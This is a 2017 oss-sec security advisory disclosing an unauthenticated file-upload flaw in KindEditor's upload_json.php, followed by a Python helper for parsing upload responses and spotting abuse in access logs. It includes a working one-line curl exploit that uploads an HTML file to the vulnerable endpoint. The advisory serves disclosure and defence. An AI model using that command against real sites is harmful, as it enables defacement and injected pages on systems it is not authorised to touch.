oss-sec mailing list archives

File upload vulnerability in Kindeditor <= 4.1.12


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 05 Jul 2017 11:22:54 -0400

Title: File upload vulnerability in Kindeditor <= 4.1.12
Author: Larry W. Cashdollar, @_larry0
Date: 2017-06-14
CVE-ID:[CVE-2017-1002024]
Download Site: http://kindeditor.org/ https://github.com/kindsoft/kindeditor/
Vendor: KindSoft
Vendor Notified: 2017-06-15
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=195
Description: KindEditor is a lightweight, Open Source (LGPL), cross-browser, web-based WYSIWYG HTML editor. KindEditor has the ability to convert standard text areas to rich text editing.
Vulnerability:
It appears there is a remote file upload vulnerability in KindEditor <= 4.1.12, specifically in 
kindeditor/php/upload_json.php. The file doesn't sanitize user input or check that the user should be allowed to upload files to 
the system. It appears it doesn't allow .php, .phtml, .shtml or other server-executable extensions. You can upload an .html file and 
call it once it's uploaded to the web server path, but there is no server-side code execution.

Exploit Code:
A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via a 
POST request is all that's required to exploit this vulnerability:

        $ curl -F "imgFile=@test.html" "http://example.com/kindeditor/php/upload_json.php?dir=file"

        {"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}


This vulnerability is being actively exploited in the wild to deface sites.  The software vendor has not responded to 
the issue I posted three weeks ago.

https://github.com/kindsoft/kindeditor/issues/249
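As an added example (not part of this advisory and not KindEditor's own code), the following Python helper does two things a practitioner wants when triaging this issue: it interprets the JSON reply that upload_json.php returns for an upload attempt, normalizing the "php/../attached/" path so the stored file can be fetched and confirmed, and it scans web-server access logs for the upload-then-fetch pattern that a defacement via this endpoint leaves behind. The field name imgFile, the dir=file parameter and the response format come from the advisory; the log lines are constructed samples and every function and constant name is this example's own.

```python
import json
import posixpath
import re
from urllib.parse import urlparse

# Extensions the advisory says upload_json.php refuses. Anything else, notably
# .html, is stored and served back from under the web root.
SERVER_EXECUTABLE = {".php", ".phtml", ".shtml"}
# Extensions a browser renders as a page: enough for defacement or stored XSS
# even without server-side code execution.
BROWSER_EXECUTABLE = {".html", ".htm", ".xhtml", ".svg"}


def classify_upload_response(body):
    """Interpret the JSON upload_json.php returns for one upload attempt.

    {"error":0,"url":...} means the file was stored at that web path. The url
    embeds 'php/../attached/...', so it is normalized before the caller
    fetches it to confirm the file is reachable.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return {"accepted": False, "reason": "response is not JSON"}
    if data.get("error") != 0 or not data.get("url"):
        return {"accepted": False, "reason": data.get("message", "rejected")}
    path = posixpath.normpath(data["url"])
    ext = posixpath.splitext(path)[1].lower()
    return {
        "accepted": True,
        "path": path,
        "browser_executable": ext in BROWSER_EXECUTABLE,
        "server_executable": ext in SERVER_EXECUTABLE,
    }


# Combined/common log format: client, identd, user, [time], "request", status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3})'
)


def find_upload_abuse(log_lines):
    """Return (ip, path) pairs where a client first POSTed to upload_json.php
    and got a 200, then fetched a browser-renderable file from the attached/
    directory: the deface-by-upload pattern the advisory describes."""
    uploaders = set()
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.group("ip", "method", "target", "status")
        path = urlparse(target).path
        ext = posixpath.splitext(path)[1].lower()
        if method == "POST" and path.endswith("/upload_json.php") and status == "200":
            uploaders.add(ip)
        elif (method == "GET" and "/attached/" in path
              and ext in BROWSER_EXECUTABLE and ip in uploaders):
            hits.append((ip, path))
    return hits


# Constructed sample log lines (not real traffic); the timestamp and file name
# mirror the advisory's example response.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jun/2017:20:32:36 +0000] "POST /kindeditor/php/upload_json.php?dir=file HTTP/1.1" 200 89',
    '203.0.113.5 - - [13/Jun/2017:20:32:40 +0000] "GET /kindeditor/attached/file/20170613/20170613203236_37481.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Jun/2017:20:35:01 +0000] "GET /kindeditor/attached/image/20170613/photo.jpg HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(classify_upload_response(
        '{"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}'))
    print(find_upload_abuse(SAMPLE_LOG))
```

The log scan only flags a GET of a renderable file by a host that already posted successfully to upload_json.php; a legitimate editor user fetching an uploaded image is not reported. When pairing this with a real web server, also check that the normalized path is served from a directory that the server does not treat as executable.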
